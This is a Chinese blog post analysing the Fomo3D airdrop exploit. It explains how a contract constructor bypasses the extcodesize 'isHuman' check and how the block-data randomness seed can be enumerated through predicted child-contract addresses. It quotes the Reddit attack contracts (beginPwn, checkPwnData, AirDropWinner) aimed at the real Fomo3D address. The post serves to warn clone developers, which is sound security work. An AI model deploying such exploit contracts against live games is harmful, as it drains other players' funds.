Fomo3D随机数生成机制攻击

最新推荐文章于 2020-05-13 14:41:20 发布
最新推荐文章于 2020-05-13 14:41:20 发布
阅读量1.7w 收藏 1
点赞数
分类专栏: 区块链安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011721501/article/details/82684747
版权

0x00 概述

Fomo3D是一个非常流行的,并且成为币圈现象级的资金盘游戏。据笔者所知,目前国内大部分资金盘游戏都是从Fomo3D的几个合约基础上进行的修改。然而,在7月23号,国外著名社区reddit上有人发现了Fomo3D的一处漏洞[1],攻击者可以利用一定的手段来绕过Fomo3D的防护,从而可以无限制命中空投来进行牟利。

本文主要分析这个攻击的具体原理,并提醒广大山寨Fomo3D的项目方,需要小心编写代码,以免上线即归零。

0x01 Fomo3D的空投机制

一切还得从Fomo3d的一个函数修改器说起:

这里使用了extcodesize指令来获取某个以太坊地址的code字符串长度。我们都知道以太坊账户分为两种,一种是普通账户,一种是合约账户,合约账户的codesize必然是大于0的,而普通账户的则为0,因此通过这种方式来判断某个地址是否是合约地址。

这里使用了extcodesize指令来获取某个以太坊地址的code字符串长度。我们都知道以太坊账户分为两种,一种是普通账户,一种是合约账户,合约账户的codesize必然是大于0的,而普通账户的则为0,因此通过这种方式来判断某个地址是否是合约地址。

因此这个isHuman方法就是Fomo3D用来防止某些人用合约来玩这个游戏的,但是这个判断靠不靠谱呢?

自然是不靠谱的,我们看看extcodesize源码实现:

func opExtCodeSize(pc *uint64, evm *EVM, contract *Contract, memory *Memory, stack *Stack) ([]byte, error) {
    a := stack.pop()
​
    addr := common.BigToAddress(a)
    a.SetInt64(int64(evm.StateDB.GetCodeSize(addr)))
    stack.push(a)
​
    return nil, nil
}

这里获取长度是从状态数据库中获取的,因此只有合约创建好之后这个判断才有效。

如果是某个合约的构造函数中执行请求Fomo3D,那么在构造函数执行过程中,合约还处于部署阶段,因此extcodesize执行的结果还是为0,从而就可以绕过这个判断。

我们再来看看执行空投逻辑的airdrop函数:

可以看到,seed的计算严重依赖于以太坊区块的数据,比如timestamp, difficulty, coinbase, gasLimit, number等字段,这些都是交易中固定的。唯一的变量就是这里的msg.sender。但是对于合约账户来说,我们可以自己写个合约来动态创建合约,对seed进行枚举,如果发现符合条件的seed,就可以调用fomo3d的airdrop来获取空投,即百分之百的几率可以获取到空投。

由于普通账户不便于进行枚举,主要过程不好自动化,操作成本太大,所以这才有前面的isHuman来对合约账户进行拦截。

正常来讲,Fomo3d的空投是按照充值ETH的数额来决定的,数额越大,获取空投的机会就越多,但是通过上面的攻击,我们可以以很小的数额来撸空投获利。

 

0x02 攻击合约解析

在参考链接[2]中,reddit上给出了具体的攻击代码(该代码不能直接成功执行攻击)。

入口函数是beginPwn,这里首先调用了checkPwnData来获取出猜解命中空投条件的攻击成本、合约地址以及猜解次数。然后如果攻击成本大于收益,那么就执行deployContracts执行具体的攻击。

function beginPwn() public onlyAdmin() {
    uint256 _pwnCost;
    uint256 _nContracts;
    address _newSender;
    (_pwnCost, _nContracts,_newSender) = checkPwnData();
        
	//check that the cost of executing the attack will make it worth it
    if(_pwnCost + 0.1 ether < maxAmount) {
       deployContracts(_nContracts,_newSender);
    }
}

我们看一下checkPwnData的逻辑:

function checkPwnData() private returns(uint256,uint256,address) {
    //The address that a contract deployed by this contract will have
    address _newSender = address(keccak256(abi.encodePacked(0xd6, 0x94, address(this), 0x01)));
    uint256 _nContracts = 0;
    uint256 _pwnCost = 0;
    uint256 _seed = 0;
    uint256 _tracker = fomo3d.airDropTracker_();
    bool _canWin = false;
    while(!_canWin) {
        /* 
        * How the seed if calculated in fomo3d.
        * We input a new address each time until we get to a winning seed.
        */
        _seed = uint256(keccak256(abi.encodePacked(
                (block.timestamp) +
                (block.difficulty) +
                ((uint256(keccak256(abi.encodePacked(block.coinbase)))) / (now)) +
                (block.gaslimit) +
                ((uint256(keccak256(abi.encodePacked(_newSender)))) / (now)) +
                (block.number)
        )));

        //Tally number of contract deployments that'll result in a win. 
        //We tally the cost of deploying blank contracts.
        if((_seed - ((_seed / 1000) * 1000)) >= _tracker) {
            _newSender = address(keccak256(abi.encodePacked(0xd6, 0x94, _newSender, 0x01)));
            _nContracts++;
            _pwnCost+= blankContractCost;
        } else {
            _canWin = true;
            //Add the cost of deploying a contract that will result in the winning of an airdrop
            _pwnCost += pwnContractCost;
        }
    }
    return (_pwnCost,_nContracts,_newSender);
}

这里需要了解合约中创建子合约时,子合约的地址生成机制,这些子合约的地址都是根据母合约的地址衍生出来的,公式如下:

new_address = address(keccak256(0xd6, 0x94, address, nonce))
new_address2 = address(keccak256(0xd6, 0x94, address, nonce++))

这里的nonce第一次为0x01,之后每次创建一次子合约就会递增。

当枚举出符合条件的seed之后,就返回枚举的次数以及命中的地址和攻击的花销,因为部署合约和跨合约调用是需要消耗gas的,因此要看攻击本身是否是划算的。

最后调用deployContracts执行攻击:

function deployContracts(uint256 _nContracts,address _newSender) private {
    for(uint256 _i; _i < _nContracts; _i++) {
        if(_i++ == _nContracts) {
            address(_newSender).call.value(0.1 ether)();
            new AirDropWinner();
        }
    	new BlankContract();
    }
}

这里的new BlankContract()是用来使得nonce递增的,然后满足了递增次数之后就创建AirDropWinner执行攻击:

contract AirDropWinner {
    FoMo3DlongInterface private fomo3d = FoMo3DlongInterface(0xA62142888ABa8370742bE823c1782D17A0389Da1);
    constructor() public {
        if(!address(fomo3d).call.value(0.1 ether)()) {
           fomo3d.withdraw();
           selfdestruct(msg.sender);
        }
    }
}

可以看到这里在构造函数中对fomo3D发起了转账操作,从而绕过了isHuman判断,完成了攻击。

具体的攻击交易:

需要注意的是,当空投池大于一定数值的时候才有利可图。这是因为发起一次交易本身需要gas也很昂贵,如果玩游戏的人越多,那么就越有利可图。

 

Reference

[1] https://www.reddit.com/r/ethereum/comments/916xni/how_to_pwn_fomo3d_a_beginners_guide

[2] https://www.reddit.com/r/ethdev/comments/91fpqd/fomo_3d_exploit_improved_clearly_explained

隐形人真忙
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fomo3d源码一键部署
08-07
本地部署指南 部署合约: 一共部署了3个合约, 其中3个收款地址被砍掉(改成了部署者的地址), p3d 也砍掉了 3...主要是对源码所有合约整理归类, 解释下合约都有啥作用, 希望对刚接触 fomo3d, 想学习 fomo3d 的有所帮助!
Fomo3D玩法及规则解析
Blockchain666的博客
07-24 8917
官网链接:http://exitscam.me/happy 一、Fomo3D是什么? Fomo3D是由Team Just团队打造的一款资金盘游戏, 直接在以太坊网络上运行,和以太猫一样的分布式应用程序 (Dapp)。该游戏由智能合约精心编程和部署,本身完全去中心化, 不受任何人控制,它将自动运行直到以太坊网络死亡,无论底池有多么诱人,只会根据游戏规则进行支付。 二、游戏规则 用户通过购...
Fomo3D会让以太坊走向终结吗?
Linvo's blog
07-21 2265
(上图为:Fomo3D此时奖池金额) 关于Fomo3D是什么,这两天已经有太多文章进行科普,这里就不做详细介绍了。 简要来说的话,它就是一个逆旁氏的资金盘游戏。 为什么都说它是人类历史上最牛的庞氏骗局,我认为它的核心亮点有两个: 1、加入了逆旁氏的逻辑 2、基于区块链 第一,什么是“逆旁氏”?传统的旁氏骗局都是先入资金赚后入资金,一旦后入资金不足则崩盘,最后一棒的接盘侠...
Fomo3D教程:如何参与Fomo3D和赚钱
zcCATzc的博客
08-23 1521
Fomo3D官网:https://exitscam.me/soon%20game Fomo3D游戏,有两个版本:“F3D:Quick”即快速版与“F3D:long”长版,它们的运行方式十分类似。文章末尾有一个‘附录’提到了交易过程中你可能遇到的问题,你也可以参考。 首先Fomo3D游戏(又名F3D)是一种基于区块链的游戏,你可以获取很多的被动收入并且有可能获得的大额资金奖励。在本教程中,我...
OWASP 区块链安全 Top10
Leon~博客
05-13 819
分析、整理2011年至2019年之间160个典型的区块链安全事件。 目录 一、高级可持续威胁 1、描述 2、危害 3、修复 二、失控的币值膨胀 1、描述 2、危害 3、修复 三、失效的权限控制 1、描述 2、利用方式 3、修复 四、不安全的共识协议 1、描述 2、利用方式 3、修复 五、考虑不充分的程序逻辑 1、描述 2、利用方式 3、修复 六、不严谨的业务策略 1、描述 2、利用方式 3、修复 七、校验不严格的交易逻辑 1、描述 2、利用方式 3、
Fomo3D 源码解析及下载, 部署指南, truffle 套件, 含前后端
这不是博客
07-31 3527
代码在 gayhub 上 : fomo3d_truffle , 以下是 README 说明 本项目通过reed 大佬的 fomo3d_clone 项目改造而成, 感谢 reed 大佬!!! 经过本人吐血试验折腾, 弄好了一次性编译部署 (没啥必要, 但我就是喜欢死磕) 本地部署指南 部署合约: npm install ganache-cli -g ganache-cli -...
Fomo3D:Fomo3D合约
04-29
Fomo3D Fomo3D合同。
fomo3d_mine:fomo3d修改版本
04-27
说明本代码核心部分从fomo3d摘取过来,分拆,按照类来存放。然后按照我的理解,裁剪了一部分的代码,特别是把跟p3d相关的东西去掉。然后重新命名了一些合约。把otherF3D_的相关逻辑干掉了,那部分收益给了社区。具体...
FOMO3D Companion-crx插件
04-03
FOMO3D Clock Watchers的伴侣。 这是什么? -厌倦了必须加载整个网站来检查计时器的烦恼吗? 不再,此扩展将为您提供计时器的恒定视图。 -曾经希望您可以收到有关计时器的通知吗? 现在您可以了,当计时器经过某个点...
独家 | Fomo 3D 沦陷?为何又是 DDoS攻击?来听听区块链安全大牛的深度解析
区块链大本营
08-01 5686
自7月8日,一款运行在以太坊上的带有明显博弈性质的区块链游戏火了,这是继EOS-RAM之后,又一个用惊人收益刷新着我们认知的“新物种”,它就是Fomo 3D。 然而就在...
eth-xrandom:XOR-keccak256随机数生成器,用于智能合约随机性
05-02
XRandom XOR-keccak256随机数生成器在Javascript和Solidity中的实现。 XRandom旨在用于需要随机性的智能合约。 设计 XRandom的种子被计算为所有输入的XOR。 输入为32字节( uint256中的uint256 )。 下一个随机数将作为前一个数字的keccak-256哈希值生成。 生成的随机数均为32个字节。 实作 Java脚本 var XRandom = require ( 'eth-xrandom' ) // number, hex string, bignumber are all supported var xrng = new XRandom ( [ 42 , 1337 , '0x2329' ] ) // the random numbers generated are `bignum` objects var r1 = xrng
3D玫瑰
04-11
NULL 博文链接:https://anllin.iteye.com/blog/1684463
f3d源码(修改版)
08-28
有兴趣的可以下载去看,作了相关注释,整合了官网的f3d源码。
微.解析FoMo3D及其赝品(含智能合约解释)
weixin_43058274的博客
08-26 1035
之前很火的Dapp遊戲FoMo3D第一輪結果出來了,這位幸運兒花了0.7個eth卻贏到10,469個Eth(將近三百萬美金,也就是兩千一百萬人民幣) 由於這件事情讓FoMo3D重回大家的視線中,所以我也稍微研究了一下相關FoMo3D(包含智能合約),這篇寫的是一些簡單的分析(非技術背景出身,但是覺得區塊鏈只淪為炒作實在是太辜負這樣一項創新技術,想用比較深入淺出的方式讓更多人認識區塊鏈) 歡迎大...
FOMO3D 资料大全
agecntao的专栏
07-26 2571
FOMO3D这游戏超魔性,虽然它是以太坊的。 既然我们是EOS博客,先说说 F3D 和 EOS 可能的关联。 Fomo3D的好处很明显:可以帮助锁仓、增加用户数、拉升链上交易活跃度。尤其是EOS有这么多中国玩家,配合国人搏一把心态,加上EOS网络速度,很难不爆发。 而且已经有人做了一个受F3D启发的EOS DAPP出来了,虽然玩法上还不够精致 https://eosbutton.io/ ...
FOMO3D白话游戏规则
加密星球
07-25 7010
废话少说,开始白话FOMO3D游戏规则。层层递进,由浅入深。 1.0 基本规则 这是一个智能合约背书的乐透抽奖游戏,在每轮游戏结束时,最后一个购买Key的人将会赢得奖池里的绝大部分奖金。 在一轮游戏中,玩家可以买一个或者更多的Key,这个行为会重置倒计时器,并使该玩家成为当前的领先者。 每一次购买Key的行为,都会使得Key的价格微小的上涨。随着游戏的进行,后来的玩家持续购买Key,先前的...
Fomo3D 游戏的第一轮是如何结束的
程序新视界
08-28 2101
本文作者:风静縠纹平(区块链布道者) 原文地址:https://www.jianshu.com/p/3e9dfc3200ca 以太坊网络上备受瞩目的游戏Fomo3DFomo3D:Long)其第一轮在北京时间8月22日下午3点左右结束了。最终地址为0xa169…的玩家获得了 10469.66Eth的奖金,其取款交易被记录在了6191962区块中,该玩家在游戏中的总投入不到0.8Et...
FOMO 3D 的合约分析
niumenglong1的博客
07-30 1250
关于 FOMO 的合约无论是设计上还是代码实现上都很精妙值得技术人员好好研究学习,目前简单的溢出等安全问题是没有的,倒是代码里面有一个方法让人值得琢磨结合这个Twitter(如图)。   chunchou.com 最新全中文大型P3D游戏 昨天刚开盘 盘子还不大 国内服务器 公司背书 正规备案域名 代码全公开 没有漏洞 永不会跑路 进去网站送5个KEYS 先到先得 数量有限 无论如何 ...
区块链对人性的嘲讽:明知是老鼠窝,玩家仍砸百万入场“菠菜”应用
Jack_123654的博客
07-20 3596
  本文由公众号DappVision原创首发,转载请联系授权   据不完全统计,目前以太坊上运行着136个博彩类Dapp,其中,etheroll自今年2月上线以来,持续稳坐榜首。好景不长,近期一款名为Fomo3D的博彩Dapp上线不足一月就倒逼etheroll走下神坛,凭借远超第二名的日活喜登冠军宝座。更让人意外的是,自称是“老鼠窝”的Fomo3D,短短十来天,ETH入账过千,想来这背后...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值